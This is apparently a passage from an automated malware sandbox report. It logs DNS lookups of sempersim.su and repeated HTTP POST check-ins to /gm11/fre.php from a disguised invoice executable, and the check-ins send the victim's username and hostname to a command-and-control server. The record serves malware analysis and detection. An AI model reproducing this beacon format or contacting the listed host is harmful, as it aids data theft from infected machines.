                                Nov 30, 2022 00:55:27.103034019 CET192.168.2.38.8.8.80xea01Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:29.162121058 CET192.168.2.38.8.8.80x4235Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:31.020256042 CET192.168.2.38.8.8.80xa106Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:32.870194912 CET192.168.2.38.8.8.80x86eeStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:34.318233967 CET192.168.2.38.8.8.80x2d83Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:36.286011934 CET192.168.2.38.8.8.80xbdf8Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:38.197046041 CET192.168.2.38.8.8.80x23f4Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:40.126117945 CET192.168.2.38.8.8.80x856eStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:42.001540899 CET192.168.2.38.8.8.80x3a49Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:43.898413897 CET192.168.2.38.8.8.80x4c7eStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:45.675020933 CET192.168.2.38.8.8.80xd354Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:47.178193092 CET192.168.2.38.8.8.80x8af6Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:49.289719105 CET192.168.2.38.8.8.80xc369Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:51.152832031 CET192.168.2.38.8.8.80xe950Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:53.393349886 CET192.168.2.38.8.8.80x9913Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:55.557055950 CET192.168.2.38.8.8.80x2074Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:57.444180012 CET192.168.2.38.8.8.80x2543Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:58.869049072 CET192.168.2.38.8.8.80x92c3Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:59.940840960 CET192.168.2.38.8.8.80x3488Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:56:00.958663940 CET192.168.2.38.8.8.80x58c4Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 30, 2022 00:54:07.240958929 CET8.8.8.8192.168.2.30x6188No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:09.420834064 CET8.8.8.8192.168.2.30x5d3bNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:12.468837023 CET8.8.8.8192.168.2.30xb7e8No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:14.780765057 CET8.8.8.8192.168.2.30x4082No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:16.898757935 CET8.8.8.8192.168.2.30x22b9No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:18.881309032 CET8.8.8.8192.168.2.30xeaacNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:20.096685886 CET8.8.8.8192.168.2.30x28fbNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:22.415709972 CET8.8.8.8192.168.2.30xee98No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:24.639362097 CET8.8.8.8192.168.2.30x2624No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:26.723373890 CET8.8.8.8192.168.2.30x5477No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:29.064884901 CET8.8.8.8192.168.2.30xdeccNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:31.840390921 CET8.8.8.8192.168.2.30x1c2dNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:33.781332970 CET8.8.8.8192.168.2.30xf2e6No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:35.912352085 CET8.8.8.8192.168.2.30x1fc5No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:37.897547007 CET8.8.8.8192.168.2.30xbadNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:39.908864975 CET8.8.8.8192.168.2.30x785cNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:41.997195005 CET8.8.8.8192.168.2.30xabafNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:43.768886089 CET8.8.8.8192.168.2.30x692bNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:45.479480982 CET8.8.8.8192.168.2.30x4377No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:47.487802982 CET8.8.8.8192.168.2.30xbe7aNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:49.559163094 CET8.8.8.8192.168.2.30x9c9aNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:51.546144009 CET8.8.8.8192.168.2.30xb58No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:53.473742008 CET8.8.8.8192.168.2.30xdac7No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:54.668741941 CET8.8.8.8192.168.2.30xaacdNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:56.395571947 CET8.8.8.8192.168.2.30x479cNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:58.123743057 CET8.8.8.8192.168.2.30xea9fNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:59.861439943 CET8.8.8.8192.168.2.30x16e7No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:01.613591909 CET8.8.8.8192.168.2.30x35c4No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:03.413459063 CET8.8.8.8192.168.2.30x8db7No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:05.205918074 CET8.8.8.8192.168.2.30xa497No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:06.988650084 CET8.8.8.8192.168.2.30x67dbNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:08.753017902 CET8.8.8.8192.168.2.30x7db5No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:10.565411091 CET8.8.8.8192.168.2.30x1fa1No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:12.396709919 CET8.8.8.8192.168.2.30x4f02No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:14.183665037 CET8.8.8.8192.168.2.30x4ab6No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:16.003206015 CET8.8.8.8192.168.2.30x3921No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:17.801747084 CET8.8.8.8192.168.2.30xc7dcNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:19.582814932 CET8.8.8.8192.168.2.30x46b9No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:21.547068119 CET8.8.8.8192.168.2.30x213No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:23.385291100 CET8.8.8.8192.168.2.30x1d07No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:25.206536055 CET8.8.8.8192.168.2.30x6e37No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:27.120949030 CET8.8.8.8192.168.2.30xea01No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:29.179055929 CET8.8.8.8192.168.2.30x4235No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:31.039771080 CET8.8.8.8192.168.2.30xa106No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:32.889683008 CET8.8.8.8192.168.2.30x86eeNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:34.335309029 CET8.8.8.8192.168.2.30x2d83No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:36.303749084 CET8.8.8.8192.168.2.30xbdf8No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:38.214360952 CET8.8.8.8192.168.2.30x23f4No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:40.145720959 CET8.8.8.8192.168.2.30x856eNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:42.019203901 CET8.8.8.8192.168.2.30x3a49No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:43.915456057 CET8.8.8.8192.168.2.30x4c7eNo error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:45.694405079 CET8.8.8.8192.168.2.30xd354No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:47.198072910 CET8.8.8.8192.168.2.30x8af6No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:49.307233095 CET8.8.8.8192.168.2.30xc369No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:51.172306061 CET8.8.8.8192.168.2.30xe950No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:53.412369013 CET8.8.8.8192.168.2.30x9913No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:55.574852943 CET8.8.8.8192.168.2.30x2074No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:57.463988066 CET8.8.8.8192.168.2.30x2543No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:58.886452913 CET8.8.8.8192.168.2.30x92c3No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:59.957931995 CET8.8.8.8192.168.2.30x3488No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:56:00.977658987 CET8.8.8.8192.168.2.30x58c4No error (0)sempersim.su95.213.216.202A (IP address)IN (0x0001)false
                                • sempersim.su
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.34969995.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:07.324934006 CET121OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 190
                                Connection: close
                                Nov 30, 2022 00:54:07.390280008 CET121OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: 'ckav.ruhardz051829DESKTOP-716T771k08F9C4E9C79A3B52B3F739430HyCKb
                                Nov 30, 2022 00:54:08.932713032 CET122INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:11 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 15
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.34970095.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:09.487690926 CET123OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 190
                                Connection: close
                                Nov 30, 2022 00:54:09.545732975 CET123OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: 'ckav.ruhardz051829DESKTOP-716T771+08F9C4E9C79A3B52B3F739430vRti9
                                Nov 30, 2022 00:54:11.058943987 CET123INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:13 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 15
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                10192.168.2.34970995.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:29.164231062 CET135OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:29.220927000 CET135OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:30.691042900 CET136INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:33 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                11192.168.2.34971095.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:31.910937071 CET137OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:31.975130081 CET137OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:33.459515095 CET137INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:36 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                12192.168.2.34971195.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:33.859061956 CET138OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:33.916356087 CET138OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:35.462241888 CET139INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:38 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                13192.168.2.34971295.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:35.972913027 CET139OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:36.032005072 CET140OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:37.552263021 CET140INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:40 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                14192.168.2.34971395.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:37.979212999 CET141OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:38.045681953 CET141OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:39.587399960 CET141INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:42 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                15192.168.2.34971495.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:39.977727890 CET142OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:40.042785883 CET143OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:41.602416039 CET143INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:44 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                16192.168.2.34971595.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:42.060767889 CET144OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:42.120702982 CET144OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:43.541337013 CET144INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:46 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                17192.168.2.34971695.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:43.829219103 CET145OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:43.885901928 CET146OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:45.204539061 CET146INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:48 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                18192.168.2.34971795.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:45.540558100 CET147OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:45.597480059 CET147OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:47.032787085 CET147INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:49 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                19192.168.2.34971895.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:47.592006922 CET148OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:47.657054901 CET148OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
